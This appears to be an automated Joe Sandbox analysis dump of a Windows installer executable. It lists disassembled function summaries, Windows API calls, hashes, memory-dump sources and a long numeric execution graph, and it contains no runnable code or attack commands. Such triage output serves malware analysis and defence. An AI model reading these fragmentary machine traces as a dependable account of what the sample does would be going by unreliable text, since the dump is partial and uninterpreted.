                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                                              • Instruction ID: 950938491bfceb2c9a9aaf13ad46a3c9d7f26d5a45bb245acca2c437b02a68c6
                                              • Opcode Fuzzy Hash: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                                              • Instruction Fuzzy Hash: 52119EB1500228EBDF11AF91DD80E9B3729AF84325F00803BFB09751A2C77D89519FAA
                                              APIs
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                                • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                                              • lstrlenW.KERNEL32(0045FE18,?,00000000,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 004060A3
                                              • GetFileAttributesW.KERNEL32(0045FE18,0045FE18), ref: 004060B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: le@
                                              • API String ID: 3248276644-3503961380
                                              • Opcode ID: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                                              • Instruction ID: e7db63e0e35e78dffee219aaf6f46514b8882a9137312b684398864940085c4f
                                              • Opcode Fuzzy Hash: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
                                              • Instruction Fuzzy Hash: DF01F22219592159D622A73A1D88EAF2584CE86364717063FFC43B21D3DF3C896389BE
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00002003,00000000), ref: 00402478
                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000), ref: 00402483
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringlstrcmp
                                              • String ID: !N~
                                              • API String ID: 623250636-529124213
                                              • Opcode ID: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                                              • Instruction ID: 97e2760095c772b904354d470d60f9b26315119a41df21907abd1c807f0e2d98
                                              • Opcode Fuzzy Hash: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
                                              • Instruction Fuzzy Hash: 5CF01275900214ABDB00BFA8DD859AE3BBCAB08300B00412EF601F71A2D67449019B94
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                                              • CloseHandle.KERNEL32(?), ref: 0040571E
                                              Strings
                                              • Error launching installer, xrefs: 004056F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                                              • Instruction ID: 53ccf60803aa8836d7366e45e4d019fb0888d0b7e4ffe46943b31cf4c1d238f5
                                              • Opcode Fuzzy Hash: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
                                              • Instruction Fuzzy Hash: A6E0EC70500209BBEB009B64EE49D7B7BBCEB44345F404436AD51E2151D774D81C9A69
                                              APIs
                                              • lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                                              • lstrcmpiA.KERNEL32(00000000,00406495), ref: 0040588C
                                              • CharNextA.USER32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 0040589D
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                                              • Instruction ID: 678e37072a379e1faffe29b6aa71237c6b28e2b3d53614aa4618b887c013b5be
                                              • Opcode Fuzzy Hash: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
                                              • Instruction Fuzzy Hash: 2CF0C236501448EFE701AFA5CD00C9F7BA8EF46350B2580BAEC40F7311D634DE019BA8

                                              Execution Graph

                                              Execution Coverage:3.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:81
                                              execution_graph 97915 b31016 97920 b45ce7 97915->97920 97930 b50fe6 97920->97930 97922 b45cef 97923 b3101b 97922->97923 97940 b45f39 97922->97940 97927 b52f70 97923->97927 98030 b52e74 97927->98030 97929 b31025 97932 b50fee 97930->97932 97933 b51008 97932->97933 97935 b5100c std::exception::exception 97932->97935 97968 b5593c 97932->97968 97985 b535d1 DecodePointer 97932->97985 97933->97922 97986 b587cb RaiseException 97935->97986 97937 b51036 97987 b58701 58 API calls _free 97937->97987 97939 b51048 97939->97922 97941 b45cfb 97940->97941 97942 b45f42 97940->97942 97944 b45d13 97941->97944 97943 b52f70 __cinit 67 API calls 97942->97943 97943->97941 97996 b41207 97944->97996 97948 b45d6e 97957 b45d9b 97948->97957 98014 b41981 97948->98014 97950 b45d8f 98018 b4133d 97950->98018 97952 b45e00 GetCurrentProcess IsWow64Process 97953 b45e19 97952->97953 97955 b45e2f 97953->97955 97956 b45e98 GetSystemInfo 97953->97956 97954 b81098 98010 b455f0 97955->98010 97958 b45e65 97956->97958 97957->97952 97957->97954 97958->97923 97961 b45e41 97963 b455f0 2 API calls 97961->97963 97962 b45e8c GetSystemInfo 97964 b45e56 97962->97964 97965 b45e49 GetNativeSystemInfo 97963->97965 97964->97958 97966 b45e5c FreeLibrary 97964->97966 97965->97964 97966->97958 97969 b559b7 97968->97969 97974 b55948 97968->97974 97994 b535d1 DecodePointer 97969->97994 97971 b55953 97971->97974 97988 b5a39b 58 API calls 2 library calls 97971->97988 97989 b5a3f8 58 API calls 7 library calls 97971->97989 97990 b532cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97971->97990 97972 b559bd 97995 b58d58 58 API calls __getptd_noexit 97972->97995 97974->97971 97976 b5597b RtlAllocateHeap 97974->97976 97979 b559a3 97974->97979 97983 b559a1 97974->97983 97991 b535d1 DecodePointer 97974->97991 97976->97974 97977 b559af 97976->97977 97977->97932 97992 b58d58 58 API calls __getptd_noexit 97979->97992 97993 b58d58 58 API calls __getptd_noexit 97983->97993 
97985->97932 97986->97937 97987->97939 97988->97971 97989->97971 97991->97974 97992->97983 97993->97977 97994->97972 97995->97977 97997 b50fe6 Mailbox 59 API calls 97996->97997 97998 b41228 97997->97998 97999 b50fe6 Mailbox 59 API calls 97998->97999 98000 b41236 GetVersionExW 97999->98000 98001 b41821 98000->98001 98002 b4182d __wsetenvp 98001->98002 98003 b4189a 98001->98003 98005 b41843 98002->98005 98006 b41868 98002->98006 98004 b41981 59 API calls 98003->98004 98009 b4184b _memmove 98004->98009 98022 b41b7c 59 API calls Mailbox 98005->98022 98023 b41c7e 98006->98023 98009->97948 98011 b45619 98010->98011 98012 b455f9 LoadLibraryA 98010->98012 98011->97961 98011->97962 98012->98011 98013 b4560a GetProcAddress 98012->98013 98013->98011 98015 b4198f 98014->98015 98017 b41998 _memmove 98014->98017 98015->98017 98026 b41aa4 98015->98026 98017->97950 98019 b4134b 98018->98019 98020 b41981 59 API calls 98019->98020 98021 b4135b 98020->98021 98021->97957 98022->98009 98024 b50fe6 Mailbox 59 API calls 98023->98024 98025 b41c88 98024->98025 98025->98009 98027 b41ab7 98026->98027 98029 b41ab4 _memmove 98026->98029 98028 b50fe6 Mailbox 59 API calls 98027->98028 98028->98029 98029->98017 98031 b52e80 __getstream 98030->98031 98038 b53447 98031->98038 98037 b52ea7 __getstream 98037->97929 98055 b59e3b 98038->98055 98040 b52e89 98041 b52eb8 DecodePointer DecodePointer 98040->98041 98042 b52ee5 98041->98042 98043 b52e95 98041->98043 98042->98043 98101 b589d4 59 API calls 2 library calls 98042->98101 98052 b52eb2 98043->98052 98045 b52f48 EncodePointer EncodePointer 98045->98043 98046 b52ef7 98046->98045 98047 b52f1c 98046->98047 98102 b58a94 61 API calls __realloc_crt 98046->98102 98047->98043 98050 b52f36 EncodePointer 98047->98050 98103 b58a94 61 API calls __realloc_crt 98047->98103 98050->98045 98051 b52f30 98051->98043 98051->98050 98104 b53450 98052->98104 98056 b59e4c 98055->98056 98057 b59e5f EnterCriticalSection 98055->98057 98062 b59ec3 98056->98062 98057->98040 
98059 b59e52 98059->98057 98086 b532e5 58 API calls 3 library calls 98059->98086 98063 b59ecf __getstream 98062->98063 98064 b59ef0 98063->98064 98065 b59ed8 98063->98065 98078 b59f11 __getstream 98064->98078 98090 b58a4d 58 API calls 2 library calls 98064->98090 98087 b5a39b 58 API calls 2 library calls 98065->98087 98068 b59edd 98088 b5a3f8 58 API calls 7 library calls 98068->98088 98069 b59f05 98072 b59f0c 98069->98072 98073 b59f1b 98069->98073 98071 b59ee4 98089 b532cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98071->98089 98091 b58d58 58 API calls __getptd_noexit 98072->98091 98076 b59e3b __lock 58 API calls 98073->98076 98079 b59f22 98076->98079 98078->98059 98080 b59f47 98079->98080 98081 b59f2f 98079->98081 98093 b52f85 98080->98093 98092 b5a05b InitializeCriticalSectionAndSpinCount 98081->98092 98084 b59f3b 98099 b59f63 LeaveCriticalSection _doexit 98084->98099 98087->98068 98088->98071 98090->98069 98091->98078 98092->98084 98094 b52f8e RtlFreeHeap 98093->98094 98095 b52fb7 _free 98093->98095 98094->98095 98096 b52fa3 98094->98096 98095->98084 98100 b58d58 58 API calls __getptd_noexit 98096->98100 98098 b52fa9 GetLastError 98098->98095 98099->98078 98100->98098 98101->98046 98102->98047 98103->98051 98107 b59fa5 LeaveCriticalSection 98104->98107 98106 b52eb7 98106->98037 98107->98106 98108 b31055 98113 b32a19 98108->98113 98111 b52f70 __cinit 67 API calls 98112 b31064 98111->98112 98114 b41207 59 API calls 98113->98114 98115 b32a87 98114->98115 98120 b31256 98115->98120 98118 b32b24 98119 b3105a 98118->98119 98123 b313f8 59 API calls 2 library calls 98118->98123 98119->98111 98124 b31284 98120->98124 98123->98118 98125 b31275 98124->98125 98126 b31291 98124->98126 98125->98118 98126->98125 98127 b31298 RegOpenKeyExW 98126->98127 98127->98125 98128 b312b2 RegQueryValueExW 98127->98128 98129 b312e8 RegCloseKey 98128->98129 98130 b312d3 98128->98130 98129->98125 98130->98129 98131 b35ff5 98145 b35ede Mailbox _memmove 98131->98145 
98132 b50fe6 59 API calls Mailbox 98132->98145 98133 b36a9b 98416 b3a9de 299 API calls 98133->98416 98136 b6eff9 98436 b35190 59 API calls Mailbox 98136->98436 98137 b36abc 98434 b9a48d 89 API calls 4 library calls 98137->98434 98139 b6f007 98437 b9a48d 89 API calls 4 library calls 98139->98437 98141 b6efeb 98189 b35569 Mailbox 98141->98189 98435 b86cf1 59 API calls Mailbox 98141->98435 98144 b360e5 98144->98137 98146 b6e137 98144->98146 98147 b363bd Mailbox 98144->98147 98172 b36152 Mailbox 98144->98172 98145->98132 98145->98133 98145->98136 98145->98137 98145->98139 98145->98144 98145->98189 98201 b353b0 98145->98201 98372 bac355 98145->98372 98415 b3523c 59 API calls 98145->98415 98420 b41c9c 98145->98420 98424 b97f11 59 API calls Mailbox 98145->98424 98425 b41a36 98145->98425 98429 b86cf1 59 API calls Mailbox 98145->98429 98146->98147 98417 b87aad 59 API calls 98146->98417 98152 b50fe6 Mailbox 59 API calls 98147->98152 98160 b36426 98147->98160 98155 b363d1 98152->98155 98155->98137 98156 b363de 98155->98156 98158 b36413 98156->98158 98159 b6e172 98156->98159 98158->98160 98188 b35447 Mailbox 98158->98188 98418 bac87c 85 API calls 2 library calls 98159->98418 98419 bac9c9 95 API calls Mailbox 98160->98419 98164 b6e19d 98164->98164 98165 b50fe6 59 API calls Mailbox 98165->98188 98167 b6f165 98439 b9a48d 89 API calls 4 library calls 98167->98439 98168 b6e691 98431 b9a48d 89 API calls 4 library calls 98168->98431 98171 b369fa 98179 b41c9c 59 API calls 98171->98179 98172->98137 98172->98141 98178 b6e2e9 VariantClear 98172->98178 98172->98189 98229 b3cfd7 98172->98229 98248 b9412a 98172->98248 98251 b3d679 98172->98251 98291 b9d6be 98172->98291 98336 bae60c 98172->98336 98339 b9413a 98172->98339 98342 baf1b2 98172->98342 98347 ba5e1d 98172->98347 98414 b35190 59 API calls Mailbox 98172->98414 98430 b87aad 59 API calls 98172->98430 98174 b6e6a0 98175 b369ff 98175->98167 98175->98168 98176 b6ea9a 98182 b41c9c 59 API calls 98176->98182 98178->98172 98179->98189 98180 
b41c9c 59 API calls 98180->98188 98182->98189 98183 b41207 59 API calls 98183->98188 98184 b6eb67 98184->98189 98432 b87aad 59 API calls 98184->98432 98185 b87aad 59 API calls 98185->98188 98186 b52f70 67 API calls __cinit 98186->98188 98188->98165 98188->98168 98188->98171 98188->98175 98188->98176 98188->98180 98188->98183 98188->98184 98188->98185 98188->98186 98188->98189 98190 b6ef28 98188->98190 98192 b35a1a 98188->98192 98412 b37e50 299 API calls 2 library calls 98188->98412 98413 b36e30 60 API calls Mailbox 98188->98413 98433 b9a48d 89 API calls 4 library calls 98190->98433 98438 b9a48d 89 API calls 4 library calls 98192->98438 98202 b353cf 98201->98202 98223 b353fd Mailbox 98201->98223 98203 b50fe6 Mailbox 59 API calls 98202->98203 98203->98223 98204 b369fa 98205 b41c9c 59 API calls 98204->98205 98225 b35569 Mailbox 98205->98225 98206 b87aad 59 API calls 98206->98223 98207 b369ff 98209 b6f165 98207->98209 98210 b6e691 98207->98210 98208 b50fe6 59 API calls Mailbox 98208->98223 98446 b9a48d 89 API calls 4 library calls 98209->98446 98442 b9a48d 89 API calls 4 library calls 98210->98442 98214 b52f70 67 API calls __cinit 98214->98223 98215 b6e6a0 98215->98145 98216 b41c9c 59 API calls 98216->98223 98217 b6ea9a 98221 b41c9c 59 API calls 98217->98221 98219 b41207 59 API calls 98219->98223 98221->98225 98222 b6eb67 98222->98225 98443 b87aad 59 API calls 98222->98443 98223->98204 98223->98206 98223->98207 98223->98208 98223->98210 98223->98214 98223->98216 98223->98217 98223->98219 98223->98222 98223->98225 98226 b6ef28 98223->98226 98228 b35a1a 98223->98228 98440 b37e50 299 API calls 2 library calls 98223->98440 98441 b36e30 60 API calls Mailbox 98223->98441 98225->98145 98444 b9a48d 89 API calls 4 library calls 98226->98444 98445 b9a48d 89 API calls 4 library calls 98228->98445 98447 b34d37 98229->98447 98233 b3d018 98234 b3d57b 98233->98234 98237 b3d439 Mailbox __wsetenvp 98233->98237 98495 b3502b 98233->98495 98234->98172 98237->98234 98239 b50c65 62 API 
calls 98237->98239 98240 b34f98 59 API calls 98237->98240 98243 b34d37 84 API calls 98237->98243 98244 b3502b 59 API calls 98237->98244 98245 b41821 59 API calls 98237->98245 98470 b5312d 98237->98470 98480 b459d3 98237->98480 98491 b45ac3 98237->98491 98499 b4162d 98237->98499 98504 b4153b 59 API calls 2 library calls 98237->98504 98505 b34f3c 59 API calls Mailbox 98237->98505 98239->98237 98240->98237 98243->98237 98244->98237 98245->98237 98577 b9494a GetFileAttributesW 98248->98577 98581 b34f98 98251->98581 98255 b50fe6 Mailbox 59 API calls 98256 b3d6aa 98255->98256 98259 b3d6ba 98256->98259 98611 b43df7 60 API calls Mailbox 98256->98611 98257 b3d6df 98263 b3502b 59 API calls 98257->98263 98267 b3d6ec 98257->98267 98258 b75068 98258->98257 98631 b9fbb7 59 API calls 98258->98631 98261 b34d37 84 API calls 98259->98261 98262 b3d6c8 98261->98262 98612 b43e47 98262->98612 98265 b750b0 98263->98265 98265->98267 98268 b750b8 98265->98268 98594 b441d6 98267->98594 98270 b3502b 59 API calls 98268->98270 98272 b3d6f3 98270->98272 98273 b750ca 98272->98273 98274 b3d70d 98272->98274 98275 b50fe6 Mailbox 59 API calls 98273->98275 98276 b41207 59 API calls 98274->98276 98277 b750d0 98275->98277 98278 b3d715 98276->98278 98279 b750e4 98277->98279 98599 b43ea1 98277->98599 98623 b43b7b 65 API calls Mailbox 98278->98623 98285 b750e8 _memmove 98279->98285 98602 b97c7f 98279->98602 98281 b3d724 98281->98285 98624 b34f3c 59 API calls Mailbox 98281->98624 98286 b3d738 Mailbox 98287 b3d772 98286->98287 98625 b442cf 98286->98625 98287->98172 98292 b9d6dd 98291->98292 98293 b9d6e8 98291->98293 98294 b3502b 59 API calls 98292->98294 98295 b9d7c2 Mailbox 98293->98295 98298 b41207 59 API calls 98293->98298 98294->98293 98296 b50fe6 Mailbox 59 API calls 98295->98296 98332 b9d7cb Mailbox 98295->98332 98297 b9d80b 98296->98297 98299 b9d817 98297->98299 98741 b43df7 60 API calls Mailbox 98297->98741 98300 b9d70c 98298->98300 98303 b34d37 84 API calls 98299->98303 98302 b41207 59 API calls 
98300->98302 98304 b9d715 98302->98304 98305 b9d82f 98303->98305 98306 b34d37 84 API calls 98304->98306 98307 b43e47 67 API calls 98305->98307 98308 b9d721 98306->98308 98309 b9d83e 98307->98309 98678 b50119 98308->98678 98311 b9d842 GetLastError 98309->98311 98312 b9d876 98309->98312 98314 b9d85b 98311->98314 98316 b9d8d8 98312->98316 98317 b9d8a1 98312->98317 98313 b9d736 98315 b417e0 59 API calls 98313->98315 98314->98332 98742 b43f0b FindCloseChangeNotification 98314->98742 98318 b9d769 98315->98318 98319 b50fe6 Mailbox 59 API calls 98316->98319 98320 b50fe6 Mailbox 59 API calls 98317->98320 98321 b9412a 3 API calls 98318->98321 98335 b9d793 Mailbox 98318->98335 98322 b9d8dd 98319->98322 98323 b9d8a6 98320->98323 98326 b9d779 98321->98326 98328 b41207 59 API calls 98322->98328 98322->98332 98327 b9d8b7 98323->98327 98329 b41207 59 API calls 98323->98329 98324 b3502b 59 API calls 98324->98295 98331 b41a36 59 API calls 98326->98331 98326->98335 98743 b9fc0d 59 API calls 2 library calls 98327->98743 98328->98332 98329->98327 98333 b9d78a 98331->98333 98332->98172 98729 b93f1d 98333->98729 98335->98324 98762 bad1c6 98336->98762 98338 bae61c 98338->98172 98340 b9494a 3 API calls 98339->98340 98341 b9413f 98340->98341 98341->98172 98343 b34d37 84 API calls 98342->98343 98344 baf1cf 98343->98344 98879 b94148 CreateToolhelp32Snapshot Process32FirstW 98344->98879 98346 baf1de 98346->98172 98348 ba5e46 98347->98348 98349 ba5e74 WSAStartup 98348->98349 98350 b3502b 59 API calls 98348->98350 98351 ba5e9d 98349->98351 98361 ba5e88 Mailbox 98349->98361 98352 ba5e61 98350->98352 98900 b440cd 98351->98900 98352->98349 98356 b3502b 59 API calls 98352->98356 98355 b34d37 84 API calls 98357 ba5eb2 98355->98357 98358 ba5e70 98356->98358 98905 b4402a WideCharToMultiByte 98357->98905 98358->98349 98360 ba5ebf inet_addr gethostbyname 98360->98361 98362 ba5edd IcmpCreateFile 98360->98362 98361->98172 98362->98361 98363 ba5f01 98362->98363 98364 b50fe6 Mailbox 59 API calls 98363->98364 
98365 ba5f1a 98364->98365 98913 b4433f 98365->98913 98368 ba5f34 IcmpSendEcho 98370 ba5f6d 98368->98370 98369 ba5f55 IcmpSendEcho 98369->98370 98371 ba5fd4 IcmpCloseHandle WSACleanup 98370->98371 98371->98361 98373 bac39a 98372->98373 98374 bac380 98372->98374 98918 baa8fd 98373->98918 98945 b9a48d 89 API calls 4 library calls 98374->98945 98378 b353b0 298 API calls 98379 bac406 98378->98379 98380 bac392 Mailbox 98379->98380 98381 bac498 98379->98381 98385 bac447 98379->98385 98380->98145 98382 bac4ee 98381->98382 98383 bac49e 98381->98383 98382->98380 98384 b34d37 84 API calls 98382->98384 98946 b97ed5 59 API calls 98383->98946 98386 bac500 98384->98386 98390 b9789a 59 API calls 98385->98390 98388 b41aa4 59 API calls 98386->98388 98391 bac524 CharUpperBuffW 98388->98391 98389 bac4c1 98947 b435b9 59 API calls Mailbox 98389->98947 98393 bac477 98390->98393 98396 bac53e 98391->98396 98395 b86ebc 298 API calls 98393->98395 98394 bac4c9 Mailbox 98948 b3b020 98394->98948 98395->98380 98397 bac591 98396->98397 98398 bac545 98396->98398 98399 b34d37 84 API calls 98397->98399 98925 b9789a 98398->98925 98401 bac599 98399->98401 98990 b35376 60 API calls 98401->98990 98406 bac5a3 98406->98380 98407 b34d37 84 API calls 98406->98407 98408 bac5be 98407->98408 98991 b435b9 59 API calls Mailbox 98408->98991 98410 bac5ce 98411 b3b020 298 API calls 98410->98411 98411->98380 98412->98188 98413->98188 98414->98172 98415->98145 98416->98137 98417->98147 98418->98160 98419->98164 98421 b41ca7 98420->98421 98422 b41caf 98420->98422 99531 b41bcc 59 API calls 2 library calls 98421->99531 98422->98145 98424->98145 98426 b41a45 __wsetenvp _memmove 98425->98426 98427 b50fe6 Mailbox 59 API calls 98426->98427 98428 b41a83 98427->98428 98428->98145 98429->98145 98430->98172 98431->98174 98432->98189 98433->98192 98434->98141 98435->98189 98436->98141 98437->98141 98438->98189 98439->98189 98440->98223 98441->98223 98442->98215 98443->98225 98444->98228 98445->98225 98446->98225 98448 b34d51 
98447->98448 98456 b34d4b 98447->98456 98449 b6db28 __i64tow 98448->98449 98450 b34d99 98448->98450 98451 b34d57 __itow 98448->98451 98455 b6da2f 98448->98455 98506 b538c8 83 API calls 4 library calls 98450->98506 98454 b50fe6 Mailbox 59 API calls 98451->98454 98457 b34d71 98454->98457 98458 b50fe6 Mailbox 59 API calls 98455->98458 98463 b6daa7 Mailbox _wcscpy 98455->98463 98465 b35278 98456->98465 98457->98456 98459 b41a36 59 API calls 98457->98459 98460 b6da74 98458->98460 98459->98456 98461 b50fe6 Mailbox 59 API calls 98460->98461 98462 b6da9a 98461->98462 98462->98463 98464 b41a36 59 API calls 98462->98464 98507 b538c8 83 API calls 4 library calls 98463->98507 98464->98463 98466 b50fe6 Mailbox 59 API calls 98465->98466 98467 b35285 98466->98467 98468 b35294 98467->98468 98469 b41a36 59 API calls 98467->98469 98468->98233 98469->98468 98471 b531ae 98470->98471 98473 b53139 98470->98473 98510 b531c0 60 API calls 4 library calls 98471->98510 98479 b5315e 98473->98479 98508 b58d58 58 API calls __getptd_noexit 98473->98508 98475 b531bb 98475->98237 98476 b53145 98509 b58fe6 9 API calls _fseek 98476->98509 98478 b53150 98478->98237 98479->98237 98481 b459fe _memset 98480->98481 98511 b45800 98481->98511 98484 b45a83 98486 b45a9d Shell_NotifyIconW 98484->98486 98487 b45ab9 Shell_NotifyIconW 98484->98487 98488 b45aab 98486->98488 98487->98488 98515 b456f8 98488->98515 98490 b45ab2 98490->98237 98492 b45b25 98491->98492 98493 b45ad5 _memset 98491->98493 98492->98237 98494 b45af4 Shell_NotifyIconW 98493->98494 98494->98492 98496 b35041 98495->98496 98497 b3503c 98495->98497 98496->98237 98497->98496 98576 b537ba 59 API calls 98497->98576 98500 b50fe6 Mailbox 59 API calls 98499->98500 98501 b41652 98500->98501 98502 b50fe6 Mailbox 59 API calls 98501->98502 98503 b41660 98502->98503 98503->98237 98504->98237 98505->98237 98506->98451 98507->98449 98508->98476 98509->98478 98510->98475 98512 b45810 98511->98512 98513 b4581c 98511->98513 98512->98484 98545 b934dd 62 API 
calls _W_store_winword 98512->98545 98513->98512 98514 b45821 DestroyIcon 98513->98514 98514->98512 98516 b45715 98515->98516 98517 b457fa Mailbox 98515->98517 98518 b4162d 59 API calls 98516->98518 98517->98490 98519 b45723 98518->98519 98520 b80c4c LoadStringW 98519->98520 98521 b45730 98519->98521 98524 b80c66 98520->98524 98522 b41821 59 API calls 98521->98522 98523 b45745 98522->98523 98525 b45752 98523->98525 98532 b80c74 98523->98532 98526 b41c9c 59 API calls 98524->98526 98525->98524 98527 b45760 98525->98527 98533 b45778 _memset _wcscpy 98526->98533 98546 b41900 98527->98546 98531 b80cb7 Mailbox 98563 b538c8 83 API calls 4 library calls 98531->98563 98532->98531 98532->98533 98534 b41207 59 API calls 98532->98534 98535 b457e0 Shell_NotifyIconW 98533->98535 98536 b80c9e 98534->98536 98535->98517 98562 b90252 60 API calls Mailbox 98536->98562 98539 b80ca9 98541 b417e0 59 API calls 98539->98541 98540 b80cd6 98542 b41900 59 API calls 98540->98542 98541->98531 98543 b80ce7 98542->98543 98544 b41900 59 API calls 98543->98544 98544->98533 98545->98484 98547 b41914 98546->98547 98548 b7f534 98546->98548 98564 b418a5 98547->98564 98550 b41c7e 59 API calls 98548->98550 98552 b7f53f __wsetenvp _memmove 98550->98552 98551 b4191f 98553 b417e0 98551->98553 98554 b7f401 98553->98554 98555 b417f2 98553->98555 98575 b887f9 59 API calls _memmove 98554->98575 98569 b41680 98555->98569 98558 b417fe 98558->98533 98559 b7f40b 98560 b41c9c 59 API calls 98559->98560 98561 b7f413 Mailbox 